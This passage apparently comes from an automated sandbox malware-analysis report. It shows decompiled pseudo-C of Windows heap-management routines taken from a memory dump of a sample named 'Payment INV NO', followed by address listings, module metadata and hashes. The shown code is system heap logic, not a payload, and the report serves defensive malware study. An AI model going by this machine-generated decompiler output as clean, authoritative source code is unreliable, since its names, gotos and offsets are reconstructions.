						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1888748 - 1;
							if( *0x1888748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E017C174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E017B7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									L018514FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01799373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01799819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1888748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0179B150();
											} else {
												E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											E0179B150();
											_t491 = 0x178d374;
											__eflags =  *0x1887bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												L01852073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											L0185A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E017BA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E017B7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E017B7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									L01851411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E017B7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E017B7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1888748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0179B150();
							} else {
								E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(0x178d364);
							E0179B150();
							__eflags =  *0x1887bc8;
							if( *0x1887bc8 == 0) {
								__eflags = 0;
								L01852073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1888748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0179B150();
												} else {
													E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push(0x178d390);
												E0179B150();
												__eflags =  *0x1887bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													L01852073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												L0185A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E017BA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E017BB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E017BA830(_t553, _v64, _v24);
								_t286 = E017B7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E017B7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										L01851411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E017B7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E017B7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = L01851411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E017C174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E017BB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E017B7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									L018514FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E017B99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E017BA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E017CABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                          0x017ba309
                                                          0x017ba316
                                                          0x017ba319
                                                          0x017ba31d
                                                          0x017ba32d
                                                          0x017ba331
                                                          0x01801e0d
                                                          0x01801e10
                                                          0x017ba3cb
                                                          0x017ba3cb
                                                          0x017ba3bd
                                                          0x017ba3c3
                                                          0x017ba3c3
                                                          0x017ba33a
                                                          0x01801e17
                                                          0x01801e1b
                                                          0x01801e1d
                                                          0x01801e2f
                                                          0x01801e34
                                                          0x01801e36
                                                          0x01801e3c
                                                          0x01801e3c
                                                          0x01801e3c
                                                          0x01801e3c
                                                          0x01801e36
                                                          0x01801e42
                                                          0x01801e45
                                                          0x01801e47
                                                          0x017ba3f8
                                                          0x017ba3f8
                                                          0x017ba3fb
                                                          0x017ba3fd
                                                          0x01801e50
                                                          0x017ba403
                                                          0x017ba411
                                                          0x017ba411
                                                          0x017ba411
                                                          0x017ba41e
                                                          0x017ba420
                                                          0x017ba424
                                                          0x017ba427
                                                          0x017ba7c9
                                                          0x017ba7cd
                                                          0x017ba7d2
                                                          0x017ba7d9
                                                          0x017ba7e0
                                                          0x017ba7e3
                                                          0x017ba7ed
                                                          0x017ba7f3
                                                          0x017ba7f9
                                                          0x017ba7ff
                                                          0x017ba802
                                                          0x017ba807
                                                          0x017ba809
                                                          0x017ba809
                                                          0x017ba809
                                                          0x017ba80f
                                                          0x017ba80f
                                                          0x017ba812
                                                          0x017ba81c
                                                          0x017ba821
                                                          0x017ba824
                                                          0x017ba42d
                                                          0x017ba42d
                                                          0x017ba42d
                                                          0x017ba42d
                                                          0x017ba42d
                                                          0x017ba436
                                                          0x017ba43a
                                                          0x017ba609
                                                          0x017ba60d
                                                          0x017ba612
                                                          0x017ba616
                                                          0x017ba61a
                                                          0x01801e57
                                                          0x01801e59
                                                          0x00000000
                                                          0x00000000
                                                          0x01801e5f
                                                          0x017ba620
                                                          0x017ba627
                                                          0x01801e64
                                                          0x01801e66
                                                          0x01801e6c
                                                          0x01801e72
                                                          0x01801e76
                                                          0x01801e95
                                                          0x01801e9a
                                                          0x01801e78
                                                          0x01801e8d
                                                          0x01801e92
                                                          0x01801ea0
                                                          0x01801ea5
                                                          0x01801eaa
                                                          0x01801eb2
                                                          0x01801eb6
                                                          0x01801eb9
                                                          0x01801eb9
                                                          0x01801ebe
                                                          0x01801ec2
                                                          0x01801ec2
                                                          0x01801e66
                                                          0x017ba62d
                                                          0x017ba633
                                                          0x017ba636
                                                          0x017ba63a
                                                          0x017ba63c
                                                          0x017ba640
                                                          0x017ba642
                                                          0x017ba644
                                                          0x017ba644
                                                          0x017ba644
                                                          0x017ba64d
                                                          0x017ba64d
                                                          0x017ba651
                                                          0x017ba655
                                                          0x01801eca
                                                          0x01801ed1
                                                          0x00000000
                                                          0x00000000
                                                          0x01801ed7
                                                          0x00000000
                                                          0x017ba65b
                                                          0x017ba669
                                                          0x017ba66e
                                                          0x017ba670
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba676
                                                          0x017ba67b
                                                          0x017ba680
                                                          0x017ba682
                                                          0x01801f1a
                                                          0x017ba688
                                                          0x017ba688
                                                          0x017ba688
                                                          0x017ba68a
                                                          0x017ba68d
                                                          0x01801f24
                                                          0x01801f2a
                                                          0x01801f31
                                                          0x01801f43
                                                          0x01801f43
                                                          0x01801f31
                                                          0x017ba693
                                                          0x017ba697
                                                          0x017ba69d
                                                          0x017ba6a0
                                                          0x017ba6a6
                                                          0x017ba6a8
                                                          0x017ba6a8
                                                          0x017ba6a8
                                                          0x017ba6a8
                                                          0x017ba6b2
                                                          0x017ba6b7
                                                          0x017ba6c1
                                                          0x017ba6c6
                                                          0x017ba6d2
                                                          0x017ba6d9
                                                          0x017ba6e3
                                                          0x017ba6e6
                                                          0x017ba6eb
                                                          0x017ba6ed
                                                          0x017ba6ed
                                                          0x017ba6ed
                                                          0x017ba6ed
                                                          0x017ba6f3
                                                          0x017ba6f8
                                                          0x017ba702
                                                          0x017ba70a
                                                          0x017ba70e
                                                          0x017ba71a
                                                          0x017ba71e
                                                          0x01801fcb
                                                          0x01801fcf
                                                          0x01801fdd
                                                          0x01801fe3
                                                          0x01801fe3
                                                          0x017ba724
                                                          0x017ba728
                                                          0x017ba72a
                                                          0x017ba72d
                                                          0x017ba737
                                                          0x017ba73a
                                                          0x017ba73c
                                                          0x017ba742
                                                          0x017ba748
                                                          0x01801f4d
                                                          0x01801f50
                                                          0x01801f56
                                                          0x01801f5c
                                                          0x01801f5f
                                                          0x01801f7e
                                                          0x01801f83
                                                          0x01801f61
                                                          0x01801f76
                                                          0x01801f7b
                                                          0x01801f8e
                                                          0x01801f93
                                                          0x01801f94
                                                          0x01801f9a
                                                          0x01801f9c
                                                          0x01801f9e
                                                          0x01801fa1
                                                          0x01801fa1
                                                          0x01801fa6
                                                          0x01801fa6
                                                          0x01801f50
                                                          0x017ba74e
                                                          0x017ba751
                                                          0x017ba754
                                                          0x017ba75d
                                                          0x017ba75e
                                                          0x017ba762
                                                          0x017ba767
                                                          0x01801faf
                                                          0x01801fb0
                                                          0x01801fb9
                                                          0x01801fbe
                                                          0x01801fc2
                                                          0x01801fc2
                                                          0x017ba76d
                                                          0x017ba76d
                                                          0x017ba775
                                                          0x017ba778
                                                          0x017ba77d
                                                          0x017ba77d
                                                          0x017ba71e
                                                          0x017ba782
                                                          0x017ba787
                                                          0x017ba789
                                                          0x01801ff3
                                                          0x017ba78f
                                                          0x017ba78f
                                                          0x017ba78f
                                                          0x017ba791
                                                          0x017ba794
                                                          0x01801ffd
                                                          0x01802006
                                                          0x0180200c
                                                          0x01802017
                                                          0x01802019
                                                          0x01802024
                                                          0x01802024
                                                          0x01802024
                                                          0x01802047
                                                          0x01802047
                                                          0x0180200c
                                                          0x017ba79a
                                                          0x017ba79f
                                                          0x017ba7a4
                                                          0x017ba7a9
                                                          0x017ba7ab
                                                          0x0180205a
                                                          0x017ba7b1
                                                          0x017ba7b1
                                                          0x017ba7b1
                                                          0x017ba7b3
                                                          0x017ba7b6
                                                          0x00000000
                                                          0x017ba7bc
                                                          0x01802066
                                                          0x01802068
                                                          0x01802073
                                                          0x01802073
                                                          0x01802073
                                                          0x01802078
                                                          0x01802079
                                                          0x0180207d
                                                          0x00000000
                                                          0x0180207d
                                                          0x017ba7b6
                                                          0x017ba440
                                                          0x017ba440
                                                          0x017ba440
                                                          0x017ba446
                                                          0x017ba44c
                                                          0x017ba44f
                                                          0x017ba453
                                                          0x017ba455
                                                          0x018020b3
                                                          0x018020b9
                                                          0x018020b9
                                                          0x017ba45d
                                                          0x017ba460
                                                          0x017ba464
                                                          0x017ba466
                                                          0x017ba46b
                                                          0x017ba46f
                                                          0x017ba471
                                                          0x017ba471
                                                          0x017ba471
                                                          0x017ba474
                                                          0x017ba479
                                                          0x017ba47d
                                                          0x017ba47f
                                                          0x01802229
                                                          0x0180222f
                                                          0x017ba3c8
                                                          0x017ba3c8
                                                          0x017ba3ca
                                                          0x017ba3ca
                                                          0x00000000
                                                          0x017ba3ca
                                                          0x01802235
                                                          0x0180223a
                                                          0x0180223a
                                                          0x00000000
                                                          0x00000000
                                                          0x01802240
                                                          0x01802246
                                                          0x0180224a
                                                          0x01802269
                                                          0x0180226e
                                                          0x0180224c
                                                          0x01802261
                                                          0x01802266
                                                          0x01802274
                                                          0x01802279
                                                          0x0180227e
                                                          0x01802286
                                                          0x01802288
                                                          0x0180228d
                                                          0x0180228d
                                                          0x01802292
                                                          0x01802292
                                                          0x01802295
                                                          0x01802295
                                                          0x00000000
                                                          0x01802295
                                                          0x017ba485
                                                          0x017ba489
                                                          0x017ba48b
                                                          0x017ba48f
                                                          0x017ba493
                                                          0x017ba497
                                                          0x017ba49b
                                                          0x017ba4bb
                                                          0x017ba4bb
                                                          0x017ba4bd
                                                          0x017ba4ff
                                                          0x017ba4ff
                                                          0x017ba501
                                                          0x017ba505
                                                          0x017ba50f
                                                          0x017ba517
                                                          0x017ba51b
                                                          0x017ba527
                                                          0x017ba52b
                                                          0x01802182
                                                          0x01802185
                                                          0x01802193
                                                          0x01802199
                                                          0x01802199
                                                          0x017ba531
                                                          0x017ba535
                                                          0x017ba538
                                                          0x017ba548
                                                          0x017ba54b
                                                          0x017ba54d
                                                          0x017ba553
                                                          0x017ba559
                                                          0x01802100
                                                          0x01802103
                                                          0x01802109
                                                          0x0180210f
                                                          0x01802112
                                                          0x01802131
                                                          0x01802136
                                                          0x01802114
                                                          0x01802129
                                                          0x0180212e
                                                          0x0180213c
                                                          0x01802141
                                                          0x01802147
                                                          0x0180214d
                                                          0x01802151
                                                          0x01802154
                                                          0x01802154
                                                          0x01802159
                                                          0x01802159
                                                          0x01802103
                                                          0x017ba55f
                                                          0x017ba562
                                                          0x017ba565
                                                          0x017ba567
                                                          0x01802162
                                                          0x017ba56d
                                                          0x017ba574
                                                          0x017ba575
                                                          0x017ba579
                                                          0x017ba57e
                                                          0x01802169
                                                          0x0180216a
                                                          0x01802170
                                                          0x01802175
                                                          0x01802179
                                                          0x01802179
                                                          0x017ba57e
                                                          0x017ba584
                                                          0x017ba58f
                                                          0x017ba58f
                                                          0x017ba52b
                                                          0x017ba5ad
                                                          0x017ba5bc
                                                          0x017ba5c1
                                                          0x017ba5c6
                                                          0x017ba5cb
                                                          0x017ba5cd
                                                          0x018021a9
                                                          0x017ba5d3
                                                          0x017ba5d3
                                                          0x017ba5d3
                                                          0x017ba5d5
                                                          0x017ba5d8
                                                          0x018021b3
                                                          0x018021bc
                                                          0x018021c2
                                                          0x018021cd
                                                          0x018021cf
                                                          0x018021da
                                                          0x018021da
                                                          0x018021da
                                                          0x018021f7
                                                          0x018021f7
                                                          0x018021c2
                                                          0x017ba5de
                                                          0x017ba5e3
                                                          0x017ba5e8
                                                          0x017ba5ea
                                                          0x0180220a
                                                          0x017ba5f0
                                                          0x017ba5f0
                                                          0x017ba5f0
                                                          0x017ba5f2
                                                          0x017ba5f5
                                                          0x01802219
                                                          0x0180221b
                                                          0x0180208c
                                                          0x0180208c
                                                          0x0180208c
                                                          0x01802095
                                                          0x01802096
                                                          0x01802097
                                                          0x01802098
                                                          0x018020a4
                                                          0x018020a5
                                                          0x018020a9
                                                          0x018020a9
                                                          0x00000000
                                                          0x017ba5f5
                                                          0x017ba4bf
                                                          0x017ba4d3
                                                          0x017ba4d8
                                                          0x017ba4da
                                                          0x01801ede
                                                          0x01801ede
                                                          0x01801ee4
                                                          0x01801ee9
                                                          0x00000000
                                                          0x00000000
                                                          0x01801f07
                                                          0x00000000
                                                          0x01801f07
                                                          0x017ba4e0
                                                          0x017ba4e5
                                                          0x017ba4e7
                                                          0x018020cb
                                                          0x017ba4ed
                                                          0x017ba4ed
                                                          0x017ba4ed
                                                          0x017ba4f2
                                                          0x017ba4f5
                                                          0x018020d5
                                                          0x018020de
                                                          0x018020e4
                                                          0x018020f6
                                                          0x018020f6
                                                          0x018020e4
                                                          0x017ba4fb
                                                          0x00000000
                                                          0x017ba4fb
                                                          0x017ba4a1
                                                          0x017ba4a4
                                                          0x017ba4a8
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba4aa
                                                          0x017ba4ac
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba4b2
                                                          0x017ba4b5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba4b5
                                                          0x017ba43a
                                                          0x017ba340
                                                          0x017ba346
                                                          0x017ba600
                                                          0x00000000
                                                          0x017ba600
                                                          0x017ba34f
                                                          0x017ba351
                                                          0x017ba358
                                                          0x017ba3c6
                                                          0x00000000
                                                          0x017ba371
                                                          0x017ba37a
                                                          0x017ba37f
                                                          0x017ba382
                                                          0x017ba384
                                                          0x017ba394
                                                          0x00000000
                                                          0x017ba396
                                                          0x017ba399
                                                          0x017ba3a7
                                                          0x017ba3b0
                                                          0x017ba3b4
                                                          0x017ba3bb
                                                          0x017ba3d2
                                                          0x017ba3da
                                                          0x017ba3df
                                                          0x017ba3e1
                                                          0x017ba3e5
                                                          0x017ba3ea
                                                          0x017ba3f0
                                                          0x017ba3f0
                                                          0x017ba3e1
                                                          0x00000000
                                                          0x017ba3bb
                                                          0x017ba394

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: 23cbbd43fda529760e25817b00a3b3792f623883d072689ca03ad8f6bfa6effe
                                                          • Instruction ID: db2e413c1579d73c8d1dcb549da1f57698176f704f593c89a5dfb16f304f4633
                                                          • Opcode Fuzzy Hash: 23cbbd43fda529760e25817b00a3b3792f623883d072689ca03ad8f6bfa6effe
                                                          • Instruction Fuzzy Hash: 2142ED706087419FD716EF28C888B6AFBE2BF84704F04496DE486CB292D774DA85CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BA830 Relevance: 2.8, Strings: 2, Instructions: 350COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 70%
                                                          			E017BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
